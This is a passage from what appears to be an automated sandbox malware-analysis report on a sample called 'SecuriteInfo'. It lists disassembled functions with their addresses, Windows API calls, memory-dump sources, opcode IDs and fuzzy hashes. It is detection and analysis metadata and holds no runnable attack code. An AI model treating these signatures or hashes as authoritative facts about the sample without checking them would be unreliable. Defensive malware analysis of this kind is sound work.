                                                                                                                                                                                                  • Instruction ID: 4ee4f6a249bc0c3e81c78d5fd0112f59702909a88bfc72b4ec70f3ada28170e8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c7751e7a25317033f419d3af6ad69e142abb1735c04488ff2bb8778ebc3600fe
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02E17336A08B81C6E720EB71E4402EEA7A4FB55B88F404531EF9D53B66EF38D655C710
                                                                                                                                                                                                  Function 00007FF74500A9B0 Relevance: 1.7, Strings: 1, Instructions: 440COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: gfff
                                                                                                                                                                                                  • API String ID: 0-1553575800
                                                                                                                                                                                                  • Opcode ID: 4bf74b520eea0981e85a8c0abaa36720e06e0e4a8230af0d778ae5f19d1e8835
                                                                                                                                                                                                  • Instruction ID: 382d9d1e3b2196d67b81cb223b98635f5e798489845fd98d0a801b0474ce9a83
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4bf74b520eea0981e85a8c0abaa36720e06e0e4a8230af0d778ae5f19d1e8835
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 88F15C6A62C196C3E718BE39E51573CA5D6BB40F80F904136EE1F877E5EA3CD9848321
                                                                                                                                                                                                  Function 00007FF7450298B4 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                  • Opcode ID: fe6c233ec407f51dd639e5eed2527f43fbd28c06470b297cc667474d11f2b2b8
                                                                                                                                                                                                  • Instruction ID: 89e10001743bb0d8a32550b953fbafca65e6d786e42d0ca63bfb8902a02f88eb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe6c233ec407f51dd639e5eed2527f43fbd28c06470b297cc667474d11f2b2b8
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5431A435A0C682C6EB24BB35E4413BAB391FF85B84F848439EA5D876A5DF3CE840C750
                                                                                                                                                                                                  Function 00007FF745029508 Relevance: 1.6, APIs: 1, Instructions: 61COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF745029D09,?,00000000,00000092,?,?,00000000,?,00007FF74501D997), ref: 00007FF7450295A6
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: EnumLocalesSystem
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2099609381-0
                                                                                                                                                                                                  • Opcode ID: 7b2f86bd01da2671e598cf7de0c50b076a47399d5def4b946fb1e618c78055b4
                                                                                                                                                                                                  • Instruction ID: 2422a52fcfcfd9f463d70ba8750b1d2b5dafe13d0ccc898c1c1ae2eac7e90872
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b2f86bd01da2671e598cf7de0c50b076a47399d5def4b946fb1e618c78055b4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0711D56BE0C645CAEB14BF25E0402B8B7A0FB50FE0F848139E629433E0DA38D9D1C750
                                                                                                                                                                                                  Function 00007FF745029AC0 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                  • Opcode ID: 7e6ef516c50e4812878c70b9499ea16e37233f3fe449cdf3471de64741bd2c35
                                                                                                                                                                                                  • Instruction ID: 86ad0502b468ace98bde9ed2fd2fbf1505c247f28f2562dd8c8d129682323ce5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e6ef516c50e4812878c70b9499ea16e37233f3fe449cdf3471de64741bd2c35
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0611E136A1C256C6EB60BB36A1401B9B2A1EB84F94FD44536EB2D833D4DE39E8C1C354
                                                                                                                                                                                                  Function 00007FF7450295D8 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(?,?,?,00007FF745029CC4,?,00000000,00000092,?,?,00000000,?,00007FF74501D997), ref: 00007FF745029656
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: EnumLocalesSystem
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2099609381-0
                                                                                                                                                                                                  • Opcode ID: 21b7764c058d3fcdd1d190dc1e181589345b1f725112053916730720054898cf
                                                                                                                                                                                                  • Instruction ID: f52e3d9499a43734cf83f0032bd1b498f9665dbef1cd7742911d8f596d6611fe
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 21b7764c058d3fcdd1d190dc1e181589345b1f725112053916730720054898cf
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C101D266E0C281C6E7207B35F444BB9B2E1EB50FA4F898231E229432E4CE7898C08710
                                                                                                                                                                                                  Function 00007FF745021890 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(?,?,00000000,00007FF745021BC8,?,?,?,?,?,?,?,?,00000000,00007FF745028B38), ref: 00007FF7450218C6
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: EnumLocalesSystem
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2099609381-0
                                                                                                                                                                                                  • Opcode ID: 4b59560eca301c954c9f8305ad21876d12b854827a016a629bfbdda0ba5ad023
                                                                                                                                                                                                  • Instruction ID: a835d01e0e06e440e36d7eed63a86930e6d890d309ab3866175e34fb6e7843a8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4b59560eca301c954c9f8305ad21876d12b854827a016a629bfbdda0ba5ad023
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 83F05E35A0C606C2E700BB21F480769B3A1EB98B80F948030E65D47375CF3CD894C740
                                                                                                                                                                                                  Function 00007FF7450247D0 Relevance: 1.4, APIs: 1, Instructions: 137COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00007FF745024875
                                                                                                                                                                                                    • Part of subcall function 00007FF7450203C0: HeapAlloc.KERNEL32(?,?,00000000,00007FF74501FEA7), ref: 00007FF745020415
                                                                                                                                                                                                    • Part of subcall function 00007FF745021270: HeapFree.KERNEL32(?,?,00007FF74501EB93,00007FF745027F3E,?,?,?,00007FF7450282BB,?,?,00000000,00007FF745028835,?,?,?,00007FF745028767), ref: 00007FF745021286
                                                                                                                                                                                                    • Part of subcall function 00007FF745021270: GetLastError.KERNEL32(?,?,00007FF74501EB93,00007FF745027F3E,?,?,?,00007FF7450282BB,?,?,00000000,00007FF745028835,?,?,?,00007FF745028767), ref: 00007FF745021290
                                                                                                                                                                                                    • Part of subcall function 00007FF74502B034: _invalid_parameter_noinfo.LIBCMT ref: 00007FF74502B067
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorHeapLast$AllocFree_invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 916656526-0
                                                                                                                                                                                                  • Opcode ID: 0a5337522d9602ccf024f6333648b3c57d9689ae7bd37e08b7a4e7134900cb89
                                                                                                                                                                                                  • Instruction ID: 7455bef7ddad938e4cf100b8712abb70b520db5af3dcfb3405f56767ef1e0653
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0a5337522d9602ccf024f6333648b3c57d9689ae7bd37e08b7a4e7134900cb89
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B241B139B1D28381FB31BB3264517BAE2846F85F80F944135FE5D47BA5DE3DE8018620
                                                                                                                                                                                                  Function 00007FF745021B34 Relevance: 1.3, Strings: 1, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: EnumSystemLocalesEx
                                                                                                                                                                                                  • API String ID: 0-2492367753
                                                                                                                                                                                                  • Opcode ID: 0b17354a364ea6a79d7500a40f6c429b309febbc3eac05fc0a72278bd3d8b27d
                                                                                                                                                                                                  • Instruction ID: 7bccf47c48451eb95945f54a3f14acfc581ffa6ab2137b74e0f1c9bf914a6b6e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b17354a364ea6a79d7500a40f6c429b309febbc3eac05fc0a72278bd3d8b27d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9611423690C746D1DB00BB60E4401AAB360FB85BA0F940632FA6D437A9DF3CE915CB50
                                                                                                                                                                                                  Function 00007FF745029F50 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: HeapProcess
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                                                                                  • Opcode ID: d8f25222e87142558990d685c60b38861d8dc2d19380d858a307dfffbb70efbd
                                                                                                                                                                                                  • Instruction ID: 725e45b58caedce9b5ad4f3e75ae449a7546a0d7dc1c70103a9026f51ac3a4b5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d8f25222e87142558990d685c60b38861d8dc2d19380d858a307dfffbb70efbd
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 14B09224E0FA02C2EA887B316C8222462A57F48B20FE84038C00D81320DE3C24B98B21
                                                                                                                                                                                                  Function 00007FF745009B20 Relevance: .5, Instructions: 474COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 7e4577c5fcecb0c9a1be16a3a773629e110347d21e5efe9c78e0ebf41f7c2b80
                                                                                                                                                                                                  • Instruction ID: 0d7707a090a29d8e24c8db6bb7a2aa3788417f07ed3eee7344f74b99fca5cd80
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7e4577c5fcecb0c9a1be16a3a773629e110347d21e5efe9c78e0ebf41f7c2b80
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5602142AB1C786C6EA14BF25F9103BAE691AB54FC4F844535DF4E53BB5DA3CE8808710
                                                                                                                                                                                                  Function 00007FF745002FD0 Relevance: .4, Instructions: 442COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 3729c8e9f127567df776f5c11c740d259bfa1b7942e84c25e3ccd376b0abd754
                                                                                                                                                                                                  • Instruction ID: fa0f8126e7586ed23ca731fd79629f6dc52a4c2fc8b1313125908d6010e8a080
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3729c8e9f127567df776f5c11c740d259bfa1b7942e84c25e3ccd376b0abd754
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4ED15EA5F0C659C3DE2AAA7EB4516F9A694B754FC4FC49035EE0E93BB0DA38E505C300
                                                                                                                                                                                                  Function 00007FF745002A50 Relevance: .4, Instructions: 428COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 5cf5040716e9b8b9c9d1641f8736891d7b4baf006e6230020532f48f2590016f
                                                                                                                                                                                                  • Instruction ID: 50d17e9caa090ed5c2e912ed0bd7d70b9360caaaab192fd0bd903646fc966abb
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5cf5040716e9b8b9c9d1641f8736891d7b4baf006e6230020532f48f2590016f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9CD13766F0855787EB28AA2EF541A7CE695E7D8B80F405035DE0A83BF0EB78E845C700
                                                                                                                                                                                                  Function 00007FF74501D7D8 Relevance: .3, Instructions: 310COMMONLIBRARYCODE
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: NameTranslate$CodePageValid_invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4003095782-0
                                                                                                                                                                                                  • Opcode ID: a8763cc3a29275fcb9126793b8c741084e0bb922defca1e244c281ecfc7efa45
                                                                                                                                                                                                  • Instruction ID: 0516e40f9f1b711b11916dfbb64e11187ef35b491fb0989a5a809b908090fd22
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8763cc3a29275fcb9126793b8c741084e0bb922defca1e244c281ecfc7efa45
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 00C1C52AA0C682D5EB60BB7199507BAB7A0FB84F88FC04031EE4E476A5EF3DD545C311
                                                                                                                                                                                                  Function 00007FF745028BFC Relevance: .3, Instructions: 268COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3215553584-0
                                                                                                                                                                                                  • Opcode ID: b842490b0cd483715218479af860fffd1e144df4892b98c5c91f5a8f38a7f2b1
                                                                                                                                                                                                  • Instruction ID: b3cc3853657943e733b054ac032e39fae0240fcc235dc376785b6e36a04ecd0f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b842490b0cd483715218479af860fffd1e144df4892b98c5c91f5a8f38a7f2b1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9B1D12EA0C746C6EB64BE30C4016B9A3A0FF54F88F844231EA1D976E9DF3CE9558750
                                                                                                                                                                                                  Function 00007FF745011790 Relevance: .3, Instructions: 258COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: d8cb145516a566238386028892f78ab8123acdcbd54ebb39f3adafc916c80b42
                                                                                                                                                                                                  • Instruction ID: 6d4f7257f5d51ef5e906612e23a61d785fe8c1a6bbe1d66bcf6d50d3f47b528a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d8cb145516a566238386028892f78ab8123acdcbd54ebb39f3adafc916c80b42
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35A1166AE0D742C6FB68B665D4147B8A691EF04FE0FD44131CA6D077E2FA6DE4418322
                                                                                                                                                                                                  Function 00007FF74502A694 Relevance: .2, Instructions: 183COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2008935176.00007FF745001000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF745000000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008851932.00007FF745000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2008970540.00007FF74502E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009113857.00007FF74519B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2009131912.00007FF74519E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff745000000_SecuriteInfo.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _invalid_parameter_noinfo
